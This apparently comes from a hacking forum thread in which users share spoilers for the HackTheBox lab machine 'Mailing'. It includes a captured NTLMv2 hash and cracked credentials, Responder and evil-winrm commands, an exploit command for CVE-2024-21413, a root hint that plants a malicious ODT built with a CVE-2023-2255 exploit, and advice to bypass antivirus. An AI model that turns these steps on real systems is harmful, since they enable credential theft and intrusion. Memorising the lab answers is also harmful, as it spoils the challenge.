Possibly Related Threads…

imassxck · May 04, 2024, 09:41 PM

(May 04, 2024, 09:38 PM)iNone Wrote:
(May 04, 2024, 09:17 PM)s1nn Wrote:
(May 04, 2024, 09:06 PM)trevor69000 Wrote: its somewhere here cant get
https://github.com/xaitax/CVE-2024-21413...me-ov-file

maya::MAILING:dac4fe0aec512cc8:0ABF7016C9D7428230E543395441DBCD:010100000000000000EF6F99469EDA01293B5F358D9EF4DE0000000002000800540058005800340001001E00570049004E002D00380038003200520041004E005000380044004500500004003400570049004E002D00380038003200520041004E00500038004400450050002E0054005800580034002E004C004F00430041004C000300140054005800580034002E004C004F00430041004C000500140054005800580034002E004C004F00430041004C000700080000EF6F99469EDA01060004000200000008003000300000000000000000000000002000009BE5ABAC0CB766267616E7031B83C21B57E7A52A6903503167DE1974F23E1F3B0A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310034002E0035000000000000000000

maya:m4y4ngs4ri

sudo responder -I tun0

python3 CVE-2024-21413.py --server mailing.htb --port 587 --username administrator@mailing.htb --password homenetworkingadministrator --sender administrator@mailing.htb --recipient maya@mailing.htb --url '\\<ip>' --subject XD

And maya:m4y4ngs4ri for what?? how you get a rev shell?

evil-winrm

trevor69000 · May 04, 2024, 09:46 PM

evil-winrm -i <ip> -u maya -p m4y4ngs4ri

game95 · May 04, 2024, 09:46 PM

(May 04, 2024, 09:17 PM)s1nn Wrote:
(May 04, 2024, 09:06 PM)trevor69000 Wrote: its somewhere here cant get
https://github.com/xaitax/CVE-2024-21413...me-ov-file

maya::MAILING:dac4fe0aec512cc8:0ABF7016C9D7428230E543395441DBCD:010100000000000000EF6F99469EDA01293B5F358D9EF4DE0000000002000800540058005800340001001E00570049004E002D00380038003200520041004E005000380044004500500004003400570049004E002D00380038003200520041004E00500038004400450050002E0054005800580034002E004C004F00430041004C000300140054005800580034002E004C004F00430041004C000500140054005800580034002E004C004F00430041004C000700080000EF6F99469EDA01060004000200000008003000300000000000000000000000002000009BE5ABAC0CB766267616E7031B83C21B57E7A52A6903503167DE1974F23E1F3B0A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310034002E0035000000000000000000

maya:m4y4ngs4ri

sudo responder -I tun0

python3 CVE-2024-21413.py --server mailing.htb --port 587 --username administrator@mailing.htb --password homenetworkingadministrator --sender administrator@mailing.htb --recipient maya@mailing.htb --url '\\<ip>' --subject XD

How do you know recipient is maya?

imassxck · May 04, 2024, 09:48 PM

and im stucking on root...

maggi · May 04, 2024, 09:57 PM

(May 04, 2024, 09:48 PM)imassxck Wrote: and im stucking on root...

I cried havoc and let slip the hounds.....but it told me to fuck off thats a virus

DataNinja · May 04, 2024, 10:06 PM

(May 04, 2024, 09:57 PM)maggi Wrote:
(May 04, 2024, 09:48 PM)imassxck Wrote: and im stucking on root...

I cried havoc and let slip the hounds.....but it told me to fuck off thats a virus

use python to bypass AV

heyitswilson · May 04, 2024, 10:11 PM

any hint for root

willow · May 04, 2024, 10:29 PM

(May 04, 2024, 09:17 PM)s1nn Wrote:
(May 04, 2024, 09:06 PM)trevor69000 Wrote: its somewhere here cant get
https://github.com/xaitax/CVE-2024-21413...me-ov-file

maya::MAILING:dac4fe0aec512cc8:0ABF7016C9D7428230E543395441DBCD:010100000000000000EF6F99469EDA01293B5F358D9EF4DE0000000002000800540058005800340001001E00570049004E002D00380038003200520041004E005000380044004500500004003400570049004E002D00380038003200520041004E00500038004400450050002E0054005800580034002E004C004F00430041004C000300140054005800580034002E004C004F00430041004C000500140054005800580034002E004C004F00430041004C000700080000EF6F99469EDA01060004000200000008003000300000000000000000000000002000009BE5ABAC0CB766267616E7031B83C21B57E7A52A6903503167DE1974F23E1F3B0A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310034002E0035000000000000000000

maya:m4y4ngs4ri

sudo responder -I tun0

python3 CVE-2024-21413.py --server mailing.htb --port 587 --username administrator@mailing.htb --password homenetworkingadministrator --sender administrator@mailing.htb --recipient maya@mailing.htb --url '\\<ip>' --subject XD

I'm a bit late to the party on this one, but <ip> is just supposed to be our attacking IP, yes? I'm getting confirmation that the mail is being sent, but I'm hearing zip on my responder interface. Even ran tcpdump to ensure things were being sent.

DataNinja · May 04, 2024, 10:46 PM

(May 04, 2024, 10:11 PM)heyitswilson Wrote: any hint for root

use this CVE-2023-2255 for root

https://github.com/elweth-sec/CVE-2023-2255

put a odt in this path C:\Important Documents\

localadmin runs it

[Image: AzgzHri.png]

CodeineBenzos · (This post was last modified: May 04, 2024, 11:45 PM by CodeineBenzos.)

(May 04, 2024, 10:46 PM)DataNinja Wrote:
(May 04, 2024, 10:11 PM)heyitswilson Wrote: any hint for root

use this CVE-2023-2255 for root

https://github.com/elweth-sec/CVE-2023-2255

put a odt in this path C:\Important Documents\

localadmin runs it

Should i run it on attacker terminal or in evil-winrm, im trying to understand this.

EDIT: nvm i'm just dumb, i created the odt. Uploading it to C:\Important Documents lets see if it works

Possibly Related Threads…
Thread		Author	Replies	Views	Last Post
	[FREE] CPTS 12 FLAGS	pulsebreaker	66	1,739	6 minutes ago Last Post: vlka
	[FREE] 300+ Writeups PDF HackTheBox/HTB premium retired	Tamarisk	370	92,403	5 hours ago Last Post: lifolifo007
	Hack the box Pro Labs, VIP, VIP+ 1 month free Method	RedBlock	23	2,201	8 hours ago Last Post: kkkato
	[FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags	Techtom	20	2,515	Yesterday, 11:06 PM Last Post: op334
	[FREE] HackTheBox All Cheatsheets	Tamarisk	3	410	Yesterday, 10:36 PM Last Post: op334